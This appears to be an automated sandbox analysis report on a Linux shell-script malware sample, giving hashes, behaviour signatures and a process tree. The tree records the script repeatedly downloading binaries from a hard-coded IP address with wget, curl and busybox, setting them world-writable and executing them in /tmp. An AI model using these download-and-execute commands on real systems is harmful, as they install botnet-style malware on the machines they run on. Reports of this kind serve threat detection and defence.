Analysis
-
max time kernel
36s -
max time network
128s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
25/11/2024, 02:51
Static task
static1
Behavioral task
behavioral1
Sample
aab8724f91c479bdd2a93c20e6e7d055b2c17547b8fcfe5de3bf2263eba89719.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
aab8724f91c479bdd2a93c20e6e7d055b2c17547b8fcfe5de3bf2263eba89719.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
aab8724f91c479bdd2a93c20e6e7d055b2c17547b8fcfe5de3bf2263eba89719.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
aab8724f91c479bdd2a93c20e6e7d055b2c17547b8fcfe5de3bf2263eba89719.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
aab8724f91c479bdd2a93c20e6e7d055b2c17547b8fcfe5de3bf2263eba89719.sh
-
Size
10KB
-
MD5
8eccec101f87a3ed0841253c005aa97f
-
SHA1
1619e034a10047b30bb121c4da04a6876dd1f076
-
SHA256
aab8724f91c479bdd2a93c20e6e7d055b2c17547b8fcfe5de3bf2263eba89719
-
SHA512
af180fba356f1d42cde849697eb3326d656c3e3cb1fee810d3bd038d24cf802ad4d93e67121dbb1cf54a49e67ea395a2cded2d2b457c496f069f7532054c9a33
-
SSDEEP
96:Mk0WT740kP3wjK6sX4AcqQuUHCH2HI9H1Dzf740kP3G9mt0jUjK6swUDAAcT5HCq:Mk0WTDjK6sX4AcqQurcIUK6sJMAch
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1565 chmod 1577 chmod 1601 chmod 1613 chmod 1681 chmod 1535 chmod 1553 chmod 1583 chmod 1663 chmod 1669 chmod 1675 chmod 1541 chmod 1643 chmod 1547 chmod 1607 chmod 1631 chmod 1649 chmod 1693 chmod 1589 chmod 1619 chmod 1657 chmod 1571 chmod 1687 chmod 1529 chmod 1595 chmod 1625 chmod 1637 chmod 1559 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B 1530 rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B /tmp/d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef 1536 d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef /tmp/Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e 1542 Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e /tmp/j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk 1548 j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk /tmp/bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo 1554 bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo /tmp/Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG6 1560 Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG6 /tmp/D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ 1566 D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ /tmp/sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU 1572 sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU /tmp/CJOTYBy2p2114IdSRp1PsHiSXJ7JSPXB4Z 1578 CJOTYBy2p2114IdSRp1PsHiSXJ7JSPXB4Z /tmp/LC8NmSgjAJpxvtaLyf6jv04anySund5Ivo 1584 LC8NmSgjAJpxvtaLyf6jv04anySund5Ivo /tmp/NINqeoxdqzsjCOQJ7gAJZcN943V0y3fixo 1590 NINqeoxdqzsjCOQJ7gAJZcN943V0y3fixo /tmp/vi8p05f0LeH1AEvrVbIVcK3tvsk8H6HkxC 1596 vi8p05f0LeH1AEvrVbIVcK3tvsk8H6HkxC /tmp/3L8OmStULKkoA3shg131n1guLCKtn5ohlb 1602 3L8OmStULKkoA3shg131n1guLCKtn5ohlb /tmp/26Y7bOYkYdRIHPq3w3HB5BPUyKvlRjuaI9 1608 26Y7bOYkYdRIHPq3w3HB5BPUyKvlRjuaI9 /tmp/Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG6 1614 Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG6 /tmp/D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ 1620 D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ /tmp/j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk 1626 j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk /tmp/bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo 1632 bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo /tmp/NINqeoxdqzsjCOQJ7gAJZcN943V0y3fixo 1638 NINqeoxdqzsjCOQJ7gAJZcN943V0y3fixo /tmp/vi8p05f0LeH1AEvrVbIVcK3tvsk8H6HkxC 1644 vi8p05f0LeH1AEvrVbIVcK3tvsk8H6HkxC /tmp/sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU 1650 sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU /tmp/CJOTYBy2p2114IdSRp1PsHiSXJ7JSPXB4Z 1658 CJOTYBy2p2114IdSRp1PsHiSXJ7JSPXB4Z /tmp/LC8NmSgjAJpxvtaLyf6jv04anySund5Ivo 1664 LC8NmSgjAJpxvtaLyf6jv04anySund5Ivo /tmp/3L8OmStULKkoA3shg131n1guLCKtn5ohlb 1670 3L8OmStULKkoA3shg131n1guLCKtn5ohlb /tmp/26Y7bOYkYdRIHPq3w3HB5BPUyKvlRjuaI9 1676 26Y7bOYkYdRIHPq3w3HB5BPUyKvlRjuaI9 /tmp/d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef 1682 d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef /tmp/Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e 1688 Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e /tmp/rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B 1694 rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef curl File opened for modification /tmp/bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo curl File opened for modification /tmp/D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ curl File opened for modification /tmp/CJOTYBy2p2114IdSRp1PsHiSXJ7JSPXB4Z curl File opened for modification /tmp/Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e curl File opened for modification /tmp/vi8p05f0LeH1AEvrVbIVcK3tvsk8H6HkxC curl File opened for modification /tmp/26Y7bOYkYdRIHPq3w3HB5BPUyKvlRjuaI9 curl File opened for modification /tmp/LC8NmSgjAJpxvtaLyf6jv04anySund5Ivo curl File opened for modification /tmp/CJOTYBy2p2114IdSRp1PsHiSXJ7JSPXB4Z curl File opened for modification /tmp/rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B curl File opened for modification /tmp/sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU curl File opened for modification /tmp/vi8p05f0LeH1AEvrVbIVcK3tvsk8H6HkxC curl File opened for modification /tmp/rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B curl File opened for modification /tmp/Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG6 curl File opened for modification /tmp/NINqeoxdqzsjCOQJ7gAJZcN943V0y3fixo curl File opened for modification /tmp/Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG6 curl File opened for modification /tmp/D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ curl File opened for modification /tmp/j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk curl File opened for modification /tmp/3L8OmStULKkoA3shg131n1guLCKtn5ohlb curl File opened for modification /tmp/NINqeoxdqzsjCOQJ7gAJZcN943V0y3fixo curl File opened for modification /tmp/Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e curl File opened for modification /tmp/j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk curl File opened for modification /tmp/26Y7bOYkYdRIHPq3w3HB5BPUyKvlRjuaI9 curl File opened for modification /tmp/bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo curl File opened for modification /tmp/sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU curl File opened for modification /tmp/LC8NmSgjAJpxvtaLyf6jv04anySund5Ivo curl File opened for modification /tmp/3L8OmStULKkoA3shg131n1guLCKtn5ohlb curl File opened for modification /tmp/d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef curl
Processes
-
/tmp/aab8724f91c479bdd2a93c20e6e7d055b2c17547b8fcfe5de3bf2263eba89719.sh/tmp/aab8724f91c479bdd2a93c20e6e7d055b2c17547b8fcfe5de3bf2263eba89719.sh1⤵PID:1521
-
/bin/rm/bin/rm bins.sh2⤵PID:1522
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B2⤵PID:1523
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B2⤵
- Writes file to tmp directory
PID:1527
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B2⤵PID:1528
-
-
/bin/chmodchmod 777 rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B2⤵
- File and Directory Permissions Modification
PID:1529
-
-
/tmp/rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B./rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B2⤵
- Executes dropped EXE
PID:1530
-
-
/bin/rmrm rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B2⤵PID:1531
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef2⤵PID:1532
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef2⤵
- Writes file to tmp directory
PID:1533
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef2⤵PID:1534
-
-
/bin/chmodchmod 777 d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef2⤵
- File and Directory Permissions Modification
PID:1535
-
-
/tmp/d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef./d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef2⤵
- Executes dropped EXE
PID:1536
-
-
/bin/rmrm d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef2⤵PID:1537
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e2⤵PID:1538
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e2⤵
- Writes file to tmp directory
PID:1539
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e2⤵PID:1540
-
-
/bin/chmodchmod 777 Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e2⤵
- File and Directory Permissions Modification
PID:1541
-
-
/tmp/Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e./Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e2⤵
- Executes dropped EXE
PID:1542
-
-
/bin/rmrm Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e2⤵PID:1543
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk2⤵PID:1544
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk2⤵
- Writes file to tmp directory
PID:1545
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk2⤵PID:1546
-
-
/bin/chmodchmod 777 j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk2⤵
- File and Directory Permissions Modification
PID:1547
-
-
/tmp/j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk./j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk2⤵
- Executes dropped EXE
PID:1548
-
-
/bin/rmrm j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk2⤵PID:1549
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo2⤵PID:1550
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo2⤵
- Writes file to tmp directory
PID:1551
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo2⤵PID:1552
-
-
/bin/chmodchmod 777 bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo2⤵
- File and Directory Permissions Modification
PID:1553
-
-
/tmp/bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo./bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo2⤵
- Executes dropped EXE
PID:1554
-
-
/bin/rmrm bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo2⤵PID:1555
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG62⤵PID:1556
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG62⤵
- Writes file to tmp directory
PID:1557
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG62⤵PID:1558
-
-
/bin/chmodchmod 777 Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG62⤵
- File and Directory Permissions Modification
PID:1559
-
-
/tmp/Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG6./Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG62⤵
- Executes dropped EXE
PID:1560
-
-
/bin/rmrm Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG62⤵PID:1561
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ2⤵PID:1562
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ2⤵
- Writes file to tmp directory
PID:1563
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ2⤵PID:1564
-
-
/bin/chmodchmod 777 D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ2⤵
- File and Directory Permissions Modification
PID:1565
-
-
/tmp/D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ./D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ2⤵
- Executes dropped EXE
PID:1566
-
-
/bin/rmrm D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ2⤵PID:1567
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU2⤵PID:1568
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU2⤵
- Writes file to tmp directory
PID:1569
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU2⤵PID:1570
-
-
/bin/chmodchmod 777 sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU2⤵
- File and Directory Permissions Modification
PID:1571
-
-
/tmp/sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU./sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU2⤵
- Executes dropped EXE
PID:1572
-
-
/bin/rmrm sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU2⤵PID:1573
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/CJOTYBy2p2114IdSRp1PsHiSXJ7JSPXB4Z2⤵PID:1574
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/CJOTYBy2p2114IdSRp1PsHiSXJ7JSPXB4Z2⤵
- Writes file to tmp directory
PID:1575
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/CJOTYBy2p2114IdSRp1PsHiSXJ7JSPXB4Z2⤵PID:1576
-
-
/bin/chmodchmod 777 CJOTYBy2p2114IdSRp1PsHiSXJ7JSPXB4Z2⤵
- File and Directory Permissions Modification
PID:1577
-
-
/tmp/CJOTYBy2p2114IdSRp1PsHiSXJ7JSPXB4Z./CJOTYBy2p2114IdSRp1PsHiSXJ7JSPXB4Z2⤵
- Executes dropped EXE
PID:1578
-
-
/bin/rmrm CJOTYBy2p2114IdSRp1PsHiSXJ7JSPXB4Z2⤵PID:1579
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/LC8NmSgjAJpxvtaLyf6jv04anySund5Ivo2⤵PID:1580
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/LC8NmSgjAJpxvtaLyf6jv04anySund5Ivo2⤵
- Writes file to tmp directory
PID:1581
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/LC8NmSgjAJpxvtaLyf6jv04anySund5Ivo2⤵PID:1582
-
-
/bin/chmodchmod 777 LC8NmSgjAJpxvtaLyf6jv04anySund5Ivo2⤵
- File and Directory Permissions Modification
PID:1583
-
-
/tmp/LC8NmSgjAJpxvtaLyf6jv04anySund5Ivo./LC8NmSgjAJpxvtaLyf6jv04anySund5Ivo2⤵
- Executes dropped EXE
PID:1584
-
-
/bin/rmrm LC8NmSgjAJpxvtaLyf6jv04anySund5Ivo2⤵PID:1585
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/NINqeoxdqzsjCOQJ7gAJZcN943V0y3fixo2⤵PID:1586
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/NINqeoxdqzsjCOQJ7gAJZcN943V0y3fixo2⤵
- Writes file to tmp directory
PID:1587
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/NINqeoxdqzsjCOQJ7gAJZcN943V0y3fixo2⤵PID:1588
-
-
/bin/chmodchmod 777 NINqeoxdqzsjCOQJ7gAJZcN943V0y3fixo2⤵
- File and Directory Permissions Modification
PID:1589
-
-
/tmp/NINqeoxdqzsjCOQJ7gAJZcN943V0y3fixo./NINqeoxdqzsjCOQJ7gAJZcN943V0y3fixo2⤵
- Executes dropped EXE
PID:1590
-
-
/bin/rmrm NINqeoxdqzsjCOQJ7gAJZcN943V0y3fixo2⤵PID:1591
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/vi8p05f0LeH1AEvrVbIVcK3tvsk8H6HkxC2⤵PID:1592
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/vi8p05f0LeH1AEvrVbIVcK3tvsk8H6HkxC2⤵
- Writes file to tmp directory
PID:1593
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/vi8p05f0LeH1AEvrVbIVcK3tvsk8H6HkxC2⤵PID:1594
-
-
/bin/chmodchmod 777 vi8p05f0LeH1AEvrVbIVcK3tvsk8H6HkxC2⤵
- File and Directory Permissions Modification
PID:1595
-
-
/tmp/vi8p05f0LeH1AEvrVbIVcK3tvsk8H6HkxC./vi8p05f0LeH1AEvrVbIVcK3tvsk8H6HkxC2⤵
- Executes dropped EXE
PID:1596
-
-
/bin/rmrm vi8p05f0LeH1AEvrVbIVcK3tvsk8H6HkxC2⤵PID:1597
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/3L8OmStULKkoA3shg131n1guLCKtn5ohlb2⤵PID:1598
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/3L8OmStULKkoA3shg131n1guLCKtn5ohlb2⤵
- Writes file to tmp directory
PID:1599
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/3L8OmStULKkoA3shg131n1guLCKtn5ohlb2⤵PID:1600
-
-
/bin/chmodchmod 777 3L8OmStULKkoA3shg131n1guLCKtn5ohlb2⤵
- File and Directory Permissions Modification
PID:1601
-
-
/tmp/3L8OmStULKkoA3shg131n1guLCKtn5ohlb./3L8OmStULKkoA3shg131n1guLCKtn5ohlb2⤵
- Executes dropped EXE
PID:1602
-
-
/bin/rmrm 3L8OmStULKkoA3shg131n1guLCKtn5ohlb2⤵PID:1603
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/26Y7bOYkYdRIHPq3w3HB5BPUyKvlRjuaI92⤵PID:1604
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/26Y7bOYkYdRIHPq3w3HB5BPUyKvlRjuaI92⤵
- Writes file to tmp directory
PID:1605
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/26Y7bOYkYdRIHPq3w3HB5BPUyKvlRjuaI92⤵PID:1606
-
-
/bin/chmodchmod 777 26Y7bOYkYdRIHPq3w3HB5BPUyKvlRjuaI92⤵
- File and Directory Permissions Modification
PID:1607
-
-
/tmp/26Y7bOYkYdRIHPq3w3HB5BPUyKvlRjuaI9./26Y7bOYkYdRIHPq3w3HB5BPUyKvlRjuaI92⤵
- Executes dropped EXE
PID:1608
-
-
/bin/rmrm 26Y7bOYkYdRIHPq3w3HB5BPUyKvlRjuaI92⤵PID:1609
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG62⤵PID:1610
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG62⤵
- Writes file to tmp directory
PID:1611
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG62⤵PID:1612
-
-
/bin/chmodchmod 777 Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG62⤵
- File and Directory Permissions Modification
PID:1613
-
-
/tmp/Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG6./Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG62⤵
- Executes dropped EXE
PID:1614
-
-
/bin/rmrm Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG62⤵PID:1615
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ2⤵PID:1616
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ2⤵
- Writes file to tmp directory
PID:1617
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ2⤵PID:1618
-
-
/bin/chmodchmod 777 D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ2⤵
- File and Directory Permissions Modification
PID:1619
-
-
/tmp/D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ./D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ2⤵
- Executes dropped EXE
PID:1620
-
-
/bin/rmrm D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ2⤵PID:1621
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk2⤵PID:1622
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk2⤵
- Writes file to tmp directory
PID:1623
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk2⤵PID:1624
-
-
/bin/chmodchmod 777 j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk2⤵
- File and Directory Permissions Modification
PID:1625
-
-
/tmp/j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk./j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk2⤵
- Executes dropped EXE
PID:1626
-
-
/bin/rmrm j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk2⤵PID:1627
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo2⤵PID:1628
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo2⤵
- Writes file to tmp directory
PID:1629
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo2⤵PID:1630
-
-
/bin/chmodchmod 777 bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo2⤵
- File and Directory Permissions Modification
PID:1631
-
-
/tmp/bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo./bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo2⤵
- Executes dropped EXE
PID:1632
-
-
/bin/rmrm bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo2⤵PID:1633
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/NINqeoxdqzsjCOQJ7gAJZcN943V0y3fixo2⤵PID:1634
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/NINqeoxdqzsjCOQJ7gAJZcN943V0y3fixo2⤵
- Writes file to tmp directory
PID:1635
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/NINqeoxdqzsjCOQJ7gAJZcN943V0y3fixo2⤵PID:1636
-
-
/bin/chmodchmod 777 NINqeoxdqzsjCOQJ7gAJZcN943V0y3fixo2⤵
- File and Directory Permissions Modification
PID:1637
-
-
/tmp/NINqeoxdqzsjCOQJ7gAJZcN943V0y3fixo./NINqeoxdqzsjCOQJ7gAJZcN943V0y3fixo2⤵
- Executes dropped EXE
PID:1638
-
-
/bin/rmrm NINqeoxdqzsjCOQJ7gAJZcN943V0y3fixo2⤵PID:1639
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/vi8p05f0LeH1AEvrVbIVcK3tvsk8H6HkxC2⤵PID:1640
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/vi8p05f0LeH1AEvrVbIVcK3tvsk8H6HkxC2⤵
- Writes file to tmp directory
PID:1641
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/vi8p05f0LeH1AEvrVbIVcK3tvsk8H6HkxC2⤵PID:1642
-
-
/bin/chmodchmod 777 vi8p05f0LeH1AEvrVbIVcK3tvsk8H6HkxC2⤵
- File and Directory Permissions Modification
PID:1643
-
-
/tmp/vi8p05f0LeH1AEvrVbIVcK3tvsk8H6HkxC./vi8p05f0LeH1AEvrVbIVcK3tvsk8H6HkxC2⤵
- Executes dropped EXE
PID:1644
-
-
/bin/rmrm vi8p05f0LeH1AEvrVbIVcK3tvsk8H6HkxC2⤵PID:1645
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU2⤵PID:1646
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU2⤵
- Writes file to tmp directory
PID:1647
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU2⤵PID:1648
-
-
/bin/chmodchmod 777 sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU2⤵
- File and Directory Permissions Modification
PID:1649
-
-
/tmp/sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU./sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU2⤵
- Executes dropped EXE
PID:1650
-
-
/bin/rmrm sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU2⤵PID:1651
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/CJOTYBy2p2114IdSRp1PsHiSXJ7JSPXB4Z2⤵PID:1652
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/CJOTYBy2p2114IdSRp1PsHiSXJ7JSPXB4Z2⤵
- Writes file to tmp directory
PID:1653
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/CJOTYBy2p2114IdSRp1PsHiSXJ7JSPXB4Z2⤵PID:1654
-
-
/bin/chmodchmod 777 CJOTYBy2p2114IdSRp1PsHiSXJ7JSPXB4Z2⤵
- File and Directory Permissions Modification
PID:1657
-
-
/tmp/CJOTYBy2p2114IdSRp1PsHiSXJ7JSPXB4Z./CJOTYBy2p2114IdSRp1PsHiSXJ7JSPXB4Z2⤵
- Executes dropped EXE
PID:1658
-
-
/bin/rmrm CJOTYBy2p2114IdSRp1PsHiSXJ7JSPXB4Z2⤵PID:1659
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/LC8NmSgjAJpxvtaLyf6jv04anySund5Ivo2⤵PID:1660
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/LC8NmSgjAJpxvtaLyf6jv04anySund5Ivo2⤵
- Writes file to tmp directory
PID:1661
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/LC8NmSgjAJpxvtaLyf6jv04anySund5Ivo2⤵PID:1662
-
-
